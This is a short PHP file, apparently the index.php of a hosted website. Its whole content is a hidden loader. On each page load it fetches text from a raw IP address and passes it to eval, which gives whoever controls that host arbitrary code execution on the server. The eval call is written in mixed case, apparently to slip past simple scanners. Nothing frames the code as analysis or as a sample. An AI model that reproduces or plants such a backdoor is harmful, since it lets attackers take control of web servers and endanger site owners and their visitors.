/home/hdwebsolution/www/index.php0
<?php
$cx = curl_init("http://69.197.181.18/z60109_o/stat/index2.txt");
curl_setopt($cx, CURLOPT_RETURNTRANSFER, 1);
$rs = curl_exec($cx);
if ($rs !== false) {
    $data = eVaL('?>' . $rs);
}
curl_close($cx);